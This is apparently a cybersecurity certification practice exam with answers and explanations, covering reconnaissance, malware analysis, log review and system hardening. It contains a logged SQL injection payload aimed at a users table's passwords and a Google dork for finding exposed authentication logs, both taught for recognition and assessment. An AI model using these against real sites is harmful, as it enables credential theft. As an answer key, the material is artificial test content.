C. Reconnaissance efforts do not include exploitation, and Charleen should not expect to need to include exploitation limitations in the rules of engagement. If she was conducting a full penetration test, she would need to make sure she fully understands any concerns or limitations her client has about exploitation of vulnerabilities.
93. What major issue would Charles face if he relied on hashing malware packages to identify malware packages? A. Hashing can be spoofed. B. Collisions can result in false positives. C. Hashing cannot identify unknown malware.
C. Relying on hashing means that Charles will only be able to identify the specific versions of malware packages that have already been identified. This is a consistent problem with signature-based detections, and malware packages commonly implement polymorphic capabilities that mean that two instances of the same package will not have identical hashes because of changes meant to avoid signature-based detection systems.
3. Tiffany needs to assess the patch level of a Windows 2012 server and wants to use a freely available tool to check the system for security issues. Which of the following tools will provide the most detail about specific patches installed or missing from her machine? A. nmap B. Nessus C. MBSA D. Metasploit
C. The Microsoft Baseline Security Analyzer (MBSA) is a tool provided by Microsoft that can identify installed or missing patches as well as common security misconfigurations. Since it is run with administrative rights, it will provide a better view than normal nmap and Nessus scans and provides more detailed information about specific patches that are installed. Metasploit provides some limited scanning capabilities but is not the best tool for the situation.
11. Brian's penetration testing efforts have resulted in him successfully gaining access to a target system. Using the diagram shown here, identify what step occurs at point B in the NIST SP800-115 process flow. IMAGE HERE A. Vulnerability scanning B. Discovery C. Escalating privileges D. Pivoting
C. The NIST process focuses on escalating privileges before browsing the system. If Brian was fortunate enough to compromise an administrative account remotely, he could skip this step, but in most cases, his next step is to find a local exploit or privilege escalation flaw that will allow him to have more control over the system.
28. Tracy believes that a historic version of her target's website may contain data she needs for her reconnaissance. What tool can she use to review snapshots of the website from multiple points in time? A. Time Machine B. Morlock C. Wayback Machine D. Her target's web cache
C. The Wayback Machine and similar sites capture periodic snapshots of websites from across the Internet, allowing penetration testers and others performing reconnaissance activities to gather information from historic versions of their target sites. This also means that long-term data breaches may be archived in sites like these in addition to search engine caches.
26. While reviewing Shodan scan data for his organization, John notices the following entry. Which of the following is false? IMAGE HERE A. The device allows telnet connections. B. There is a console port on a nonstandard port. C. The device requires sshv1. D. The device is an automated tank gauge.
C. The device allows a telnet connection to port 10001 and identifies itself as an automated tank gauge. John should recommend disabling telnet or protecting the device with a firewall or other security device to prevent unauthorized remote access.
90. As part of his reconnaissance effort, Charles uses the following Google search string: "authentication failure; logname=" ext:log;site:example.com What will he find if he receives results from his target's domain? A. A list of successful logins B. A list of log names C. A list of failed logins D. A list of log files
C. This Google dork relies on log files being inadvertently exposed for a site. If the authentication logs are exposed, this will show lists of failed logins, along with login paths, possibly providing Charles with a useful list of usernames. He can then leverage that list by attempting logins, by gathering further information on the users, or by using social engineering
17. Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the netflow shown here? IMAGE HERE A. 1 B. 3 C. 4 D. 5
C. This flow sample shows four distinct hosts being accessed from 192.168.2.1. They are 10.2.3.1, 10.6.2.4, 10.6.2.5, and 10.8.2.5.
98. Alex has been asked to investigate a call to one of his organization's system administrators that is believed to have led to a breach. The administrator described that call by saying that the caller identified themselves as the assistant to the director of sales and said that they needed access to a file that was critical to a sales presentation with a major client but that their laptop had died. The administrator provided a link to the file, which included the organization's sales data for the quarter. What type of social engineering occurred? A. Baiting B. Quid pro quo C. Pretexting D. Whaling
C. This is an example of pretexting, which relies on creating a scenario that the victim will believe, resulting in the attacker gaining access. Baiting uses an item or something that the user desires to cause them to fall for a phishing style attack. Quid pro quo promises a benefit in exchange for information, and whaling is a phishing attack specifically aimed at important users.
84. While reviewing his Apache logs, Charles discovers the following entry. What has occurred? 10.1.1.1 - - [27/Jun/2017:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_ id,password, Chapter 1 ■ Domain 1: Threat Management 25 name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" A. A successful database query B. A PHP overflow attack C. A SQL injection attack D. An unsuccessful database query
C. This shows an attempted SQL injection attack. The query reads 1' UNION SELECT 0 and then looks for the username, user ID, password, and email from the users table.
61. Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this? A. nbtstat -o B. nbtstat -r C. nbtstat -s D. nbtstat -c
C. To show current NetBIOS sessions and their status, Alex can issue the nbtstat -s command. The -c flag shows the NetBIOS name cache, while the -r command displays the count of NetBIOS names resolved through a WINS server query and by broadcast. There is no -o flag.
69. While conducting reconnaissance of his own organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management? A. Self-signed certificates do not provide secure encryption for site visitors. B. Self-signed certificates can be revoked only by the original creator. C. Self-signed certificates will cause warnings or error messages. D. None of the above
C. Using self-signed certificates for services that will be used by the general public or organizational users outside of a small testing group can be an issue because they will result in an error or warning in most browsers. The TLS encryption used for HTTPS will remain just as strong regardless of whether the certificate is provided by a certificate authority or self-signed, and a self-signed certificate cannot be revoked at all!
80. While conducting reconnaissance, Greg discovers what he believes is an SMTP service running on an alternate port. What technique should he use to manually validate his guess? A. Send an email via the open port. B. Send an SMTP probe. C. telnet to the port. D. ssh to the port.
C. Using telnet to connect to remote services to validate their response is a useful technique for service validation. It doesn't always work but can allow you to interact with the service to gather information manually.
42. Lucca wants to prevent workstations on his network from attacking each other. If Lucca's corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B? IMAGE HERE A. An IPS B. An IDS C. A HIPS D. A HIDS
C. When endpoints are connected without a network control point between them, a hostbased solution is required. In this case, Lucca's specific requirement is to prevent attacks, rather than simply detect them, meaning that a HIPS is required to meet his needs. Many modern products combine HIPS capabilities with other features such as data loss prevention and system compliance profiling, so Lucca may end up with additional useful capabilities if he selects a product with those features.
38. Lucy is the SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently. After her discovery in the first part of this question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows: Send a SMS alert every 30 seconds when systems do not send logs for more than 1 minute. The average administrator at Lucy's organization is responsible for 150 to 300 machines. What danger does Lucy's alert create? A. A DDoS that causes administrators to not be able to access systems B. A network outage C. Administrators may ignore or filter the alerts. D. A memory spike
C. When faced with massive numbers of notification messages that are sent too aggressively, administrators are likely to ignore or filter the alerts. Once they do, they are unlikely to respond to actual issues, causing all of the advantages of monitoring to be lost. If she doesn't spend some time identifying reasonable notification thresholds and frequencies, Lucy's next conversation is likely to be with an angry system administrator or manager.
46. Laura's organization has been receiving a large amount of spam email sent specifically to the email addresses listed in her organization's domain registrations. Which of the following techniques will help her organization limit this type of spam? A. DNS query rate limiting B. CAPTCHAs C. Using a proxy service D. Blacklisting
C. While spam to a registrant's email address may seem trivial, it may mean that important messages related to the domain are missed. The best way to limit this is to use a privacy or proxy service to register the domain. Many, if not most, popular registration services offer a privacy service, sometimes at an extra charge. Unfortunately, if a domain was previously registered before privacy services or proxies are used, that information can be looked up and used.
75. Adam's port scan returns results on six TCP ports: 22, 80, 443, 515, 631, and 9100. If Adam needs to guess what type of device this is based on these ports, what is his best guess? A. A web server B. An FTP server C. A printer D. A proxy server
C. While the first three ports are common to many of the devices listed, TCP 515 is the LPR/LPD port, 631 is the IPP port commonly used by many print servers, and TCP is the RAW, or direct, IP port. While this could be another type of device, it is most likely a network-connected printer.
35. As part of her malware analysis process, Caitlyn diagrams the high-level functions and processes that the malware uses to accomplish its goals. What is this process known as? A. Static analysis B. Composition C. Dynamic analysis D. Decomposition
D. Caitlyn is preparing a decomposition diagram that maps the high-level functions to lower-level components. This will allow her to better understand how the malware package works and may help her identify areas she should focus on.
76. Cassandra believes that attackers were able to extract a volume shadow copy of a workstation belonging to her organization's Windows domain administrator. What information should she not report as being potentially exposed? A. All files on the user's desktop B. Password hashes C. Domain details D. Plain-text Windows account passwords
D. Cassandra should report that password hashes, user files, and domain details may have been exposed. Windows does not store plain-text Windows account passwords, so this should not be a concern unless the administrator keeps them in a file!
60. Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do? A. Search for use of privileged ports in sequential order. B. Search for connections to ports in the /var/syslog directory. C. Log all kernel messages to detect scans. D. Install additional tools that can detect scans and send the logs to syslog
D. Detecting port scans requires the ability to identify scanning behavior, and the applications that create syslog entries on most default Linux distributions are not set up for this. Charles should identify a tool like psad, an IDS package, or other tool that can track connections and scan behavior and report on it and then use syslog to send those messages to his log collector or SIEM.
66. Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems? A. Enable host firewalls. B. Install patches for those services. C. Turn off the services for each appliance. D. Place a network firewall between the devices and the rest of the network.
D. Geoff's only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default; since they are appliances, they may not have host firewalls available to enable. They also often don't have patches available, and many appliances do not allow the services they provide to be disabled or modified.
39. Lucy is the SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently. Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this? A. Trend B. Availability C. Heuristic D. Behavior
D. Lucy has configured a behavior-based detection. It is likely that a reasonable percentage of the detections will be for legitimate travel for users who typically do not leave the country, but pairing this behavioral detection with other behavioral or anomaly detections can help determine whether the login is legitimate.
63. While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this? IMAGE HERE A. Continue to search for other changes. B. Run diff against the password file. C. Immediately change her password. D. Check the passwd binary against a known good version
D. The passwd binary stands out as having recently changed. This may be innocuous, but if Angela believes the machine was compromised, there is a good chance the passwd binary has been replaced with a malicious version. She should check the binary against a known good version and then follow her incident response process if it doesn't match.
62. Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on. IMAGE HERE A. 508 B. 617 C. 846 D. 714
D. The service running from the www directory as the user apache should be an immediate indication of something strange, and the use of webmin from that directory should also be a strong indicator of something wrong. Lucas should focus on the web server for the point of entry to the system and should review any files that the Apache user has created or modified. If local vulnerabilities existed when this compromise occurred, the attacker may have already escalated to another account!
56. Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file? A. grep B. more C. less D. strings
D. The strings command extracts strings of printable characters from files, allowing Ben to quickly determine the contents of files. Grep would require knowing what he is looking for, either the more or less command will simply display the file, which is often not a useful strategy for binaries.
72. Geoff needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections? IMAGE HERE A. 80, 135, 139, and 445 B. 80, 445, and 3389 C. 135, 139, and 445 D. No ports should be open.
D. The uses described for the workstation that Geoff is securing do not require inbound access to the system on any of these ports. Web browsing and Active Directory domain membership traffic can be handled by traffic initiated by the system.
33. As a member of a blue team, John observed the following behavior during an external penetration test. What should he report to his managers at the conclusion of the test. IMAGE HERE A. A significant increase in latency B. A significant increase in packet loss C. Latency and packet loss both increased. D. No significant issues were observed.
D. This chart shows typical latency for a remote system and minimal or at times zero packet loss. This chart shows normal operations, and John can safely report no visible issues.
88. During an on-site penetration test of a small business, Bob scans outward to a known host to determine the outbound network topology. What information can he gather from the results provided by Zenmap? IMAGE HERE A. There are two nodes on the local network. B. There is a firewall at IP address 96.120.24.121. C. There is an IDS at IP address 96.120.24.121. D. He should scan the 10.0.2.0/24 network.
D. This scan shows Bob that he is likely on a network using some portion of the 10.0.0.0/8 private IP space. An initial scan of the 10.0.2.0/24 network to determine what is near him would be a good start. Since the Zenmap scan was run to a single external host, it will not show other hosts on the local network, so there may be more than two nodes on the network. Bob cannot make determinations about what the host at 96.120.24.121 is, beyond a device on the route between the local host and his remote scan destination.
78. Jarett needs to protect an application server against resource exhaustion attacks. Which of the following techniques is best suited to surviving a large-scale DDoS attack? A. Enable application sharding. B. Review each query and implement query optimization. C. Implement aggressive aging at the organization's firewall. D. Employ a CDN.
D. While application sharding and query optimization can help services respond under heavy loads, Jarett's best bet is to work with a content distribution network (CDN) that has built-in DDoS mitigation technologies. This will allow his content to be accessible even if his primary service is taken offline and will spread the load to other servers during attacks, even if the CDN's anti-DDoS capabilities can't entirely mitigate the attack. Aggressive aging can help when implemented on a firewall and may help somewhat with survivability but is less useful for large-scale DDoS attacks.
31. While gathering reconnaissance data for a penetration test, Charleen uses the MxToolbox MX Lookup tool. What can she determine from the response to her query shown here? IMAGE HERE A. The mail servers are blacklisted. B. The mail servers have failed an SMTP test. C. The mail servers are clustered. D. There are two MX hosts listed in DNS.
D. While the hostnames cluster1 and cluster1a indicate that there may be a cluster of mail servers, this query does not prove that. Instead, Charleen knows that there are two MX entries for her target. She will also notice that mail hosting is handled by messagelabs, a software-as-a-service provider for email and other managed services, indicating that the public email presence for her target is handled by a specialized company. MXToolbox allows deeper queries about blacklists and SMTP tests, but this image only shows the links to them and does not provide details.
8. Charles wants to provide additional security for his web application that currently stores passwords in plain text in a database. Which of the following options is his best option to prevent theft of the database from resulting in exposed passwords? A. Encrypt the database of plain-text passwords. B. Use MD5 and a salt. C. Use SHA-1 and a salt. D. Use bcrypt.
D. bcrypt is a strong password hashing algorithm that includes salts for the stored values. If Charles uses bcrypt, he will have made the best choice from the list, as both MD5 and SHA-1 are not as strong, even with a salt. Encrypting the database may seem like a good idea, but storing plain-text passwords means that an exploit that can read the database while it is decrypted will get plain-text passwords!
23. Isaac wants to grab the banner from a remote web server using commonly available tools. Which of the following tools cannot be used to grab the banner from the remote host? A. netcat B. telnet C. wget D. ftp
D. netcat, telnet, and wget can all be used to conduct Isaac's banner-grabbing exercise. FTP will not connect properly to get the banner he wants to see.
20. During a network reconnaissance exercise, Chris gains access to a PC located in a secure network. If Chris wants to locate database and web servers that the company uses, what command-line tool can he use to gather information about other systems on the local network without installing additional tools or sending additional traffic? A. ping B. traceroute C. nmap D. netstat
D. netstat is found on Windows, Linux, and macOS systems and can provide information about other systems on the network and can provide information about open ports and systems that the host has connected to. Chris can search for common web and database server service ports to help identify the local targets he is looking for.
29. After Kristen received a copy of an nmap scan run by a penetration tester that her company hired, she knows that the tester used the -O flag. What type of information should she expect to see included in the output other than open ports? A. OCMP status B. Other ports C. Objective port assessment data in verbose mode D. Operating system and Common Platform Enumeration (CPE) data
D. nmap provides Common Platform Enumeration data when the -O (OS fingerprinting) and verbose flags are used. If Kristen had seen the -sV flag instead, she would have expected service version information.